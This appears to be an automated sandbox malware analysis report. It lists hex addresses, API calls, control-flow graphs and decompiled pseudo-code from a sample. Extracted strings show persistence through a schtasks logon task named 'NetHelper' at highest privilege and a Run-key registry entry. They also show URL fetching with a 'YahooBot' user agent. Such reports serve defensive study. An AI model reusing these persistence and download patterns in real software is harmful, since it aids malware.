                                                                                                                              0x00952a5b
                                                                                                                              0x0095284a
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00952869
                                                                                                                              0x0095286f
                                                                                                                              0x0095287a
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00952880
                                                                                                                              0x00952946
                                                                                                                              0x00952acf
                                                                                                                              0x00952ae1
                                                                                                                              0x00952ae6
                                                                                                                              0x00952af1
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00952af7
                                                                                                                              0x00952952
                                                                                                                              0x00952795
                                                                                                                              0x0095279b
                                                                                                                              0x009527a0
                                                                                                                              0x009527a3
                                                                                                                              0x00000000
                                                                                                                              0x009527a3
                                                                                                                              0x0095295e
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00952964
                                                                                                                              0x0095296a
                                                                                                                              0x0095296f
                                                                                                                              0x00952974
                                                                                                                              0x00952977
                                                                                                                              0x0095297c
                                                                                                                              0x00952991
                                                                                                                              0x00952993
                                                                                                                              0x00952993
                                                                                                                              0x0095299a
                                                                                                                              0x009529a0
                                                                                                                              0x009529a9
                                                                                                                              0x00000000
                                                                                                                              0x009529af
                                                                                                                              0x00000000
                                                                                                                              0x009529af
                                                                                                                              0x009529a9
                                                                                                                              0x009529c6
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00952b29
                                                                                                                              0x00952b3b
                                                                                                                              0x00952b3b
                                                                                                                              0x009527d6
                                                                                                                              0x009529db
                                                                                                                              0x009529df
                                                                                                                              0x009529e6
                                                                                                                              0x009529fc
                                                                                                                              0x00952a02
                                                                                                                              0x00952a0d
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00952a13
                                                                                                                              0x009527e2
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x009527f7
                                                                                                                              0x009527fd
                                                                                                                              0x00952801
                                                                                                                              0x0095280b
                                                                                                                              0x0095280d
                                                                                                                              0x0095280d
                                                                                                                              0x00952812
                                                                                                                              0x0095281a
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0095281a
                                                                                                                              0x00952896
                                                                                                                              0x00952a64
                                                                                                                              0x00952a69
                                                                                                                              0x00952a75
                                                                                                                              0x00952a7d
                                                                                                                              0x00952a89
                                                                                                                              0x00952a97
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00952a9d
                                                                                                                              0x009528a2
                                                                                                                              0x00952aa7
                                                                                                                              0x00952aac
                                                                                                                              0x00952aae
                                                                                                                              0x00952aae
                                                                                                                              0x00952ab3
                                                                                                                              0x00952ac0
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00952ac6
                                                                                                                              0x009528ae
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x009528cd
                                                                                                                              0x009528d3
                                                                                                                              0x009528d9
                                                                                                                              0x009528df
                                                                                                                              0x009528e4
                                                                                                                              0x009528ec
                                                                                                                              0x00952902
                                                                                                                              0x00952904
                                                                                                                              0x00952904
                                                                                                                              0x00952909
                                                                                                                              0x00952910
                                                                                                                              0x00952914
                                                                                                                              0x0095291a
                                                                                                                              0x00952920
                                                                                                                              0x0095292b
                                                                                                                              0x00000000
                                                                                                                              0x00952931
                                                                                                                              0x00000000
                                                                                                                              0x00952931
                                                                                                                              0x0095292b
                                                                                                                              0x00000000

                                                                                                                              APIs
                                                                                                                              • InternetOpenW.WININET(YahooBot,00000000,00000000,00000000,00000000), ref: 00952775
                                                                                                                              • InternetOpenUrlW.WININET(?,?,00000000,00000000,00000000,00000000), ref: 009527F7
                                                                                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00952869
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627486759.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_950000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InternetOpen$CreateFile
                                                                                                                              • String ID: <l$[$=l$[$=l$[$=l$[$YahooBot
                                                                                                                              • API String ID: 1736790129-2550996086
                                                                                                                              • Opcode ID: 7e6511e2fcf85470b175c212461b4267a55c388005422705658546997ed2610f
                                                                                                                              • Instruction ID: b6f48cf12e3a0e767f58c6aff6e4fcc51be23afc58f086f7c612e496768c3010
                                                                                                                              • Opcode Fuzzy Hash: 7e6511e2fcf85470b175c212461b4267a55c388005422705658546997ed2610f
                                                                                                                              • Instruction Fuzzy Hash: 8B8114306083049FD62CCF11D9D87BE77E5AF9A711F20452DFA83967E0DA755888CB86
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0096D030 Relevance: 24.4, APIs: 6, Strings: 7, Instructions: 1621COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627486759.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_950000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: %s%s%s$:$D_7$D_7$>2b$>2b$>2b
                                                                                                                              • API String ID: 0-3084027359
                                                                                                                              • Opcode ID: ce174163d8ba6ddfe399c197d75c9eab9e7aa58906b9593179333d84f6dacbda
                                                                                                                              • Instruction ID: 4fb4f74bde272be62b939a6f3e6b005fe10fd89750f383412d1efea0b44a76fd
                                                                                                                              • Opcode Fuzzy Hash: ce174163d8ba6ddfe399c197d75c9eab9e7aa58906b9593179333d84f6dacbda
                                                                                                                              • Instruction Fuzzy Hash: CDD22734B1D3418BDF388B19889472EB7E5BBA5320F644D0BE46ACB3A4D775D8429743
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00951840 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 187COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 832 951840-951880 833 9518d7-9518dc 832->833 834 951882 832->834 836 951900-951905 833->836 837 9518de-9518e3 833->837 835 951950-951955 834->835 838 951957-95195c 835->838 839 951980-951985 835->839 842 951887-9518cd wsprintfW * 2 ShellExecuteW 836->842 843 95190b-951910 836->843 840 9518e5-9518ea 837->840 841 95191a-951949 837->841 845 9519f0-951a2f RegOpenKeyW lstrlenW RegSetValueExW RegCloseKey 838->845 846 951962-951967 838->846 848 95198b-951990 839->848 849 951a4a-951abd 839->849 850 9518f0-9518f5 840->850 851 9519cf-9519e5 840->851 841->833 844 95194b 841->844 847 9518d0-9518d5 842->847 843->847 852 951912-951915 843->852 844->835 853 951a35-951a3f 845->853 846->847 855 95196d-951977 846->855 847->833 847->835 848->847 856 951996-9519c7 GetSystemDirectoryW 848->856 849->833 854 951ac3 849->854 850->847 857 9518f7-951ade call 96fb8d 850->857 851->833 858 9519eb 851->858 852->853 853->833 862 951a45 853->862 854->835 855->833 859 95197d 855->859 856->833 860 9519cd 856->860 858->835 859->835 860->835 862->835
                                                                                                                              APIs
                                                                                                                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 009519AD
                                                                                                                              Strings
                                                                                                                              • NetHelper, xrefs: 00951A1D
                                                                                                                              • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 009519F6
                                                                                                                              • /create /sc ONLOGON /tn "NetHelper" /tr "%s" /RL HIGHEST, xrefs: 009518AA
                                                                                                                              • runas, xrefs: 009518BB
                                                                                                                              • %s\schtasks.exe, xrefs: 00951890
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627486759.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_950000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DirectorySystem
                                                                                                                              • String ID: %s\schtasks.exe$/create /sc ONLOGON /tn "NetHelper" /tr "%s" /RL HIGHEST$NetHelper$Software\Microsoft\Windows\CurrentVersion\Run$runas
                                                                                                                              • API String ID: 2188284642-2927058967
                                                                                                                              • Opcode ID: 4e52b96b05fbb429e6c035507d892df5bd59f42699a419725ba3a384ddbb4e83
                                                                                                                              • Instruction ID: 3af282eba0a800d2e410d1c30c5676de7cb6a7629050ef6a559524364092cee1
                                                                                                                              • Opcode Fuzzy Hash: 4e52b96b05fbb429e6c035507d892df5bd59f42699a419725ba3a384ddbb4e83
                                                                                                                              • Instruction Fuzzy Hash: 2F611179A002099FCF20DBBA9895BAE7BF5AF89355F140511FD14F7290C3389C489B94
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00418860 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 245synchronizationCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 865 418860-4188a3 CreateMutexW GetLastError 866 4188a5-4188ac 865->866 867 4188d9-4188ef call 419fc6 call 460442 865->867 869 4188c4-4188c6 866->869 870 4188ae-4188be SetForegroundWindow ShowWindow 866->870 877 4188f4-418910 call 418d40 867->877 871 4188c8-4188c9 CloseHandle 869->871 872 4188cf-4188d4 869->872 870->869 871->872 874 418b69-418b7f call 41b3f9 872->874 881 418912-418914 877->881 882 418928-41892d 877->882 883 418916-41891c call 41b408 881->883 884 41891f-418926 881->884 885 418930-418939 882->885 883->884 888 418941-41894c call 401d80 884->888 885->885 886 41893b-418940 885->886 886->888 892 418957-4189ca call 402890 * 4 888->892 893 41894e-418954 call 41b408 888->893 904 4189d2-4189df call 404510 892->904 905 4189cc-4189d0 892->905 893->892 908 4189e1-4189e4 call 418450 904->908 909 4189e9-4189ed 904->909 905->904 908->909 911 418a05-418a2b InitCommonControlsEx CoInitializeEx 909->911 912 4189ef-4189ff 909->912 913 418a89-418a95 call 41ad5c 911->913 914 418a2d-418a37 call 404510 911->914 912->911 920 418aa2 913->920 921 418a97-418aa0 call 402830 913->921 922 418a39-418a46 914->922 923 418a58-418a5e 914->923 927 418aa4-418aad call 402550 920->927 921->927 928 418a4b-418a55 922->928 924 418a60-418a61 call 41a97d 923->924 925 418a69-418a79 923->925 938 418a66 924->938 931 418b45-418b5c 925->931 932 418a7f-418a84 925->932 940 418ad2-418af4 call 40fd30 call 4127e0 call 404510 call 403c00 927->940 941 418aaf-418ab9 call 404510 927->941 928->923 934 418b65-418b68 931->934 935 418b5e-418b5f CloseHandle 931->935 939 418b3d-418b42 call 41a97d 932->939 934->874 935->934 938->925 939->931 955 418b06-418b1b CoUninitialize call 40fda0 940->955 956 418af6-418b03 call 401bf0 call 41a97d 940->956 941->923 948 418abb-418acd 941->948 948->928 962 418b26-418b36 955->962 963 418b1d-418b23 call 41a97d 955->963 956->955 962->931 966 418b38-418b3c 962->966 963->962 966->939
                                                                                                                              C-Code - Quality: 50%
                                                                                                                              			E00418860(void* __ebx, void* __ebp, signed int _a4) {
				signed int _v4;
				char _v2188;
				char _v2192;
				struct _SECURITY_ATTRIBUTES* _v2196;
				struct _SECURITY_ATTRIBUTES* _v2200;
				intOrPtr _v2204;
				char _v2208;
				short _v2212;
				short _v2216;
				char _v2220;
				char* _v2224;
				void* _v2228;
				intOrPtr _v2232;
				void* _v2236;
				struct _SECURITY_ATTRIBUTES* _v2240;
				struct _SECURITY_ATTRIBUTES* _v2244;
				struct _SECURITY_ATTRIBUTES* _v2248;
				char* _v2252;
				char* _v2256;
				char* _v2260;
				void* _v2264;
				void* __edi;
				void* __esi;
				signed int _t58;
				void* _t61;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t67;
				void* _t78;
				void* _t79;
				void* _t80;
				void* _t81;
				void* _t87;
				void* _t88;
				intOrPtr _t89;
				void* _t96;
				void* _t97;
				intOrPtr _t102;
				struct HWND__* _t106;
				void* _t110;
				WCHAR* _t113;
				void* _t114;
				void* _t130;
				void* _t135;
				void* _t137;
				void* _t138;
				void* _t139;
				void* _t140;
				char* _t141;
				signed int _t143;
				signed int _t144;

				_t140 = __ebp;
				_t110 = __ebx;
				_t143 =  &_v2264;
				_t58 =  *0x43a6a8; // 0x2a5cd135
				_v4 = _t58 ^ _t143;
				_t113 =  *0x43a4fc; // 0x4337f4
				_v2244 = _a4;
				_t61 = CreateMutexW(0, 0, _t113); // executed
				_t137 = _t61;
				_v2236 = _t137;
				if(GetLastError() != 0xb7) {
					_push(0x400);
					_t63 = E00419FC6(__ebx, _t134, 0, _t137, __eflags);
					_push(0x400);
					_push(L"Path");
					_t138 = _t63; // executed
					E00460442(__eflags); // executed
					_v2196 = 7;
					_v2200 = 0;
					_v2216 = 0;
					_t65 = E00418D40(_t138);
					_t144 = _t143 + 0x14;
					__eflags = _t65;
					if(_t65 != 0) {
						_t66 = _t138;
						_t8 = _t66 + 2; // 0x2
						_t135 = _t8;
						do {
							_t114 =  *_t66;
							_t66 = _t66 + 2;
							__eflags = _t114;
						} while (_t114 != 0);
						_t67 = _t66 - _t135;
						__eflags = _t67;
						_push(_t67 >> 1);
						_push(_t138);
					} else {
						__eflags = _t138;
						if(__eflags != 0) {
							_push(_t138);
							L0041B408(__ebx, 0, _t138, __eflags);
							_t144 = _t144 + 4;
						}
						_push(1);
						_push(".");
					}
					E00401D80(_t110,  &_v2212);
					__eflags = _t138;
					if(__eflags != 0) {
						_push(_t138);
						L0041B408(_t110, 0, _t138, __eflags);
						_t144 = _t144 + 4;
					}
					_push(_t110);
					_push(_t140);
					_v2244 = 0;
					_v2240 = 0;
					_v2236 = 0;
					_v2252 = L"canvres.dll";
					E00402890( &_v2248,  &_v2252);
					_v2256 = L"canvimages.dll";
					E00402890( &_v2252,  &_v2256);
					_t134 =  &_v2260;
					_v2260 = L"caissresource.dll";
					E00402890( &_v2256,  &_v2260);
					_v2264 = L"caISSImages.dll";
					E00402890( &_v2260,  &_v2264);
					__eflags = _v2204 - 8;
					_t111 = _v2224;
					_t141 = _v2224;
					if(_v2204 < 8) {
						_t141 =  &_v2208;
						_t111 = _t141;
					}
					_t139 = E00404510();
					__eflags =  *(_t139 + 0xb8);
					if( *(_t139 + 0xb8) == 0) {
						E00418450(_t139, _t141, _t111);
					}
					_t78 =  *_t139;
					__eflags = _t78;
					if(_t78 != 0) {
						_t134 =  &_v2248;
						_t102 =  *_t78( &_v2248, _t141, _v2232);
						_t144 = _t144 + 0xc;
						 *((intOrPtr*)(_t139 + 0xbc)) = _t102;
					}
					_t79 =  &_v2220;
					_v2216 = 1;
					_v2220 = 8;
					__imp__InitCommonControlsEx(_t79);
					__imp__CoInitializeEx(0, 0);
					__eflags = _t79;
					if(__eflags >= 0) {
						_push(0x40);
						_t80 = E0041AD5C(8, _t134, 0, _t139, __eflags);
						_t144 = _t144 + 4;
						__eflags = _t80;
						if(_t80 == 0) {
							_t139 = 0;
							__eflags = 0;
						} else {
							_t139 = E00402830();
						}
						_t81 = E00402550(8, _t134, _t141);
						__eflags = _t81;
						if(_t81 >= 0) {
							E0040FD30( &_v2188, _t139);
							E004127E0( &_v2192, __eflags, 0);
							E00403C00(E00404510());
							__eflags = _t139;
							if(_t139 != 0) {
								E00401BF0();
								_push(_t139);
								L0041A97D(8, 0, _t139, __eflags);
								_t144 = _t144 + 4;
							}
							__imp__CoUninitialize();
							E0040FDA0( &_v2188);
							_t87 = _v2248;
							__eflags = _t87;
							if(__eflags != 0) {
								_push(_t87);
								L0041A97D(8, 0, _t139, __eflags);
								_t144 = _t144 + 4;
							}
							__eflags = _v2192 - 8;
							_v2248 = 0;
							_v2244 = 0;
							_v2240 = 0;
							if(__eflags >= 0) {
								_push(_v2212);
								goto L41;
							}
						} else {
							_t96 = E00404510();
							_t130 =  *(_t96 + 0x38);
							__eflags = _t130;
							if(_t130 == 0) {
								goto L25;
							} else {
								_push(0);
								_push(0);
								_push(0);
								_push(0xffffffff);
								_push(0x10000);
								_push(0);
								_push(0x76);
								_push(0x93);
								goto L24;
							}
							goto L45;
						}
					} else {
						_t96 = E00404510();
						_t130 =  *(_t96 + 0x38);
						__eflags = _t130;
						if(_t130 != 0) {
							_push(0);
							_push(0);
							_push(0);
							_push(0xffffffff);
							_push(0x10000);
							_push(0);
							_push(0x76);
							_push(0x94);
							L24:
							_t134 =  *(_t96 + 0xbc);
							 *_t130( *(_t96 + 0xbc), 0);
							_t144 = _t144 + 0x28;
						}
						L25:
						_t97 = _v2248;
						__eflags = _t97;
						if(__eflags != 0) {
							_push(_t97);
							L0041A97D(8, 0, _t139, __eflags);
							_t144 = _t144 + 4;
						}
						__eflags = _v2192 - 8;
						_v2248 = 0;
						_v2244 = 0;
						_v2240 = 0;
						if(__eflags >= 0) {
							_push(_v2212);
							L41:
							L0041A97D(8, 0, _t139, __eflags);
							_t144 = _t144 + 4;
						}
					}
					_t88 = _v2228;
					__eflags = _t88;
					_v2192 = 7;
					_v2196 = 0;
					_v2212 = 0;
					if(_t88 != 0) {
						CloseHandle(_t88);
					}
					_t89 = 0;
					__eflags = 0;
					_pop(_t110);
				} else {
					_t106 =  *0x43e000;
					if(_t106 != 0) {
						SetForegroundWindow(_t106);
						_t134 =  *0x43e000;
						ShowWindow( *0x43e000, 9);
					}
					if(_t137 != 0) {
						CloseHandle(_t137);
					}
					_t89 = 1;
				}
				L45:
				return E0041B3F9(_t89, _t110, _a4 ^ _t144, _t134, 0, _t139);
			}























































                                                                                                                              0x00418860
                                                                                                                              0x00418860
                                                                                                                              0x00418860
                                                                                                                              0x00418866
                                                                                                                              0x0041886d
                                                                                                                              0x00418874
                                                                                                                              0x00418888
                                                                                                                              0x0041888c
                                                                                                                              0x00418892
                                                                                                                              0x00418894
                                                                                                                              0x004188a3
                                                                                                                              0x004188d9
                                                                                                                              0x004188de
                                                                                                                              0x004188e3
                                                                                                                              0x004188e8
                                                                                                                              0x004188ed
                                                                                                                              0x004188ef
                                                                                                                              0x004188f5
                                                                                                                              0x004188fd
                                                                                                                              0x00418901
                                                                                                                              0x00418906
                                                                                                                              0x0041890b
                                                                                                                              0x0041890e
                                                                                                                              0x00418910
                                                                                                                              0x00418928
                                                                                                                              0x0041892a
                                                                                                                              0x0041892a
                                                                                                                              0x00418930
                                                                                                                              0x00418930
                                                                                                                              0x00418933
                                                                                                                              0x00418936
                                                                                                                              0x00418936
                                                                                                                              0x0041893b
                                                                                                                              0x0041893b
                                                                                                                              0x0041893f
                                                                                                                              0x00418940
                                                                                                                              0x00418912
                                                                                                                              0x00418912
                                                                                                                              0x00418914
                                                                                                                              0x00418916
                                                                                                                              0x00418917
                                                                                                                              0x0041891c
                                                                                                                              0x0041891c
                                                                                                                              0x0041891f
                                                                                                                              0x00418921
                                                                                                                              0x00418921
                                                                                                                              0x00418945
                                                                                                                              0x0041894a
                                                                                                                              0x0041894c
                                                                                                                              0x0041894e
                                                                                                                              0x0041894f
                                                                                                                              0x00418954
                                                                                                                              0x00418954
                                                                                                                              0x00418957
                                                                                                                              0x00418958
                                                                                                                              0x00418962
                                                                                                                              0x00418966
                                                                                                                              0x0041896a
                                                                                                                              0x0041896e
                                                                                                                              0x00418976
                                                                                                                              0x00418984
                                                                                                                              0x0041898c
                                                                                                                              0x00418991
                                                                                                                              0x0041899a
                                                                                                                              0x004189a2
                                                                                                                              0x004189b0
                                                                                                                              0x004189b8
                                                                                                                              0x004189c1
                                                                                                                              0x004189c4
                                                                                                                              0x004189c8
                                                                                                                              0x004189ca
                                                                                                                              0x004189cc
                                                                                                                              0x004189d0
                                                                                                                              0x004189d0
                                                                                                                              0x004189d7
                                                                                                                              0x004189d9
                                                                                                                              0x004189df
                                                                                                                              0x004189e4
                                                                                                                              0x004189e4
                                                                                                                              0x004189e9
                                                                                                                              0x004189eb
                                                                                                                              0x004189ed
                                                                                                                              0x004189f4
                                                                                                                              0x004189fa
                                                                                                                              0x004189fc
                                                                                                                              0x004189ff
                                                                                                                              0x004189ff
                                                                                                                              0x00418a05
                                                                                                                              0x00418a0f
                                                                                                                              0x00418a17
                                                                                                                              0x00418a1b
                                                                                                                              0x00418a23
                                                                                                                              0x00418a29
                                                                                                                              0x00418a2b
                                                                                                                              0x00418a89
                                                                                                                              0x00418a8b
                                                                                                                              0x00418a90
                                                                                                                              0x00418a93
                                                                                                                              0x00418a95
                                                                                                                              0x00418aa2
                                                                                                                              0x00418aa2
                                                                                                                              0x00418a97
                                                                                                                              0x00418a9e
                                                                                                                              0x00418a9e
                                                                                                                              0x00418aa6
                                                                                                                              0x00418aab
                                                                                                                              0x00418aad
                                                                                                                              0x00418ad7
                                                                                                                              0x00418ae1
                                                                                                                              0x00418aed
                                                                                                                              0x00418af2
                                                                                                                              0x00418af4
                                                                                                                              0x00418af8
                                                                                                                              0x00418afd
                                                                                                                              0x00418afe
                                                                                                                              0x00418b03
                                                                                                                              0x00418b03
                                                                                                                              0x00418b06
                                                                                                                              0x00418b10
                                                                                                                              0x00418b15
                                                                                                                              0x00418b19
                                                                                                                              0x00418b1b
                                                                                                                              0x00418b1d
                                                                                                                              0x00418b1e
                                                                                                                              0x00418b23
                                                                                                                              0x00418b23
                                                                                                                              0x00418b26
                                                                                                                              0x00418b2a
                                                                                                                              0x00418b2e
                                                                                                                              0x00418b32
                                                                                                                              0x00418b36
                                                                                                                              0x00418b3c
                                                                                                                              0x00000000
                                                                                                                              0x00418b3c
                                                                                                                              0x00418aaf
                                                                                                                              0x00418aaf
                                                                                                                              0x00418ab4
                                                                                                                              0x00418ab7
                                                                                                                              0x00418ab9
                                                                                                                              0x00000000
                                                                                                                              0x00418abb
                                                                                                                              0x00418abb
                                                                                                                              0x00418abc
                                                                                                                              0x00418abd
                                                                                                                              0x00418abe
                                                                                                                              0x00418ac0
                                                                                                                              0x00418ac5
                                                                                                                              0x00418ac6
                                                                                                                              0x00418ac8
                                                                                                                              0x00000000
                                                                                                                              0x00418ac8
                                                                                                                              0x00000000
                                                                                                                              0x00418ab9
                                                                                                                              0x00418a2d
                                                                                                                              0x00418a2d
                                                                                                                              0x00418a32
                                                                                                                              0x00418a35
                                                                                                                              0x00418a37
                                                                                                                              0x00418a39
                                                                                                                              0x00418a3a
                                                                                                                              0x00418a3b
                                                                                                                              0x00418a3c
                                                                                                                              0x00418a3e
                                                                                                                              0x00418a43
                                                                                                                              0x00418a44
                                                                                                                              0x00418a46
                                                                                                                              0x00418a4b
                                                                                                                              0x00418a4b
                                                                                                                              0x00418a53
                                                                                                                              0x00418a55
                                                                                                                              0x00418a55
                                                                                                                              0x00418a58
                                                                                                                              0x00418a58
                                                                                                                              0x00418a5c
                                                                                                                              0x00418a5e
                                                                                                                              0x00418a60
                                                                                                                              0x00418a61
                                                                                                                              0x00418a66
                                                                                                                              0x00418a66
                                                                                                                              0x00418a69
                                                                                                                              0x00418a6d
                                                                                                                              0x00418a71
                                                                                                                              0x00418a75
                                                                                                                              0x00418a79
                                                                                                                              0x00418a83
                                                                                                                              0x00418b3d
                                                                                                                              0x00418b3d
                                                                                                                              0x00418b42
                                                                                                                              0x00418b42
                                                                                                                              0x00418a79
                                                                                                                              0x00418b45
                                                                                                                              0x00418b49
                                                                                                                              0x00418b4b
                                                                                                                              0x00418b53
                                                                                                                              0x00418b57
                                                                                                                              0x00418b5c
                                                                                                                              0x00418b5f
                                                                                                                              0x00418b5f
                                                                                                                              0x00418b66
                                                                                                                              0x00418b66
                                                                                                                              0x00418b68
                                                                                                                              0x004188a5
                                                                                                                              0x004188a5
                                                                                                                              0x004188ac
                                                                                                                              0x004188af
                                                                                                                              0x004188b5
                                                                                                                              0x004188be
                                                                                                                              0x004188be
                                                                                                                              0x004188c6
                                                                                                                              0x004188c9
                                                                                                                              0x004188c9
                                                                                                                              0x004188cf
                                                                                                                              0x004188cf
                                                                                                                              0x00418b69
                                                                                                                              0x00418b7f

                                                                                                                              APIs
                                                                                                                              • CreateMutexW.KERNEL32(00000000,00000000,004337F4), ref: 0041888C
                                                                                                                              • GetLastError.KERNEL32 ref: 00418898
                                                                                                                              • SetForegroundWindow.USER32(?), ref: 004188AF
                                                                                                                              • ShowWindow.USER32(?,00000009), ref: 004188BE
                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 004188C9
                                                                                                                              • InitCommonControlsEx.COMCTL32 ref: 00418A1B
                                                                                                                              • CoInitializeEx.OLE32(00000000,00000000), ref: 00418A23
                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00418B5F
                                                                                                                                • Part of subcall function 0041AD5C: _malloc.LIBCMT ref: 0041AD74
                                                                                                                              • CoUninitialize.OLE32(-00000002,Path,00000400,00000400), ref: 00418B06
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseHandleWindow$CommonControlsCreateErrorForegroundInitInitializeLastMutexShowUninitialize_malloc
                                                                                                                              • String ID: Path$8C
                                                                                                                              • API String ID: 4252328641-3349245505
                                                                                                                              • Opcode ID: 01d7408f560869f7f81322aaf501489f9de5eb9ab6e0cabd7c61ff385e44e625
                                                                                                                              • Instruction ID: af71d8e2ff2851e4912b2b8b4b575c6731ad7b2e9529c080efacd95104841127
                                                                                                                              • Opcode Fuzzy Hash: 01d7408f560869f7f81322aaf501489f9de5eb9ab6e0cabd7c61ff385e44e625
                                                                                                                              • Instruction Fuzzy Hash: 7E8185B1508340ABC310EF56CC45D9FB7E8AFD4744F14492FF546A2291EBB89988CB6B
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0096C8F0 Relevance: 7.9, APIs: 5, Instructions: 423COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
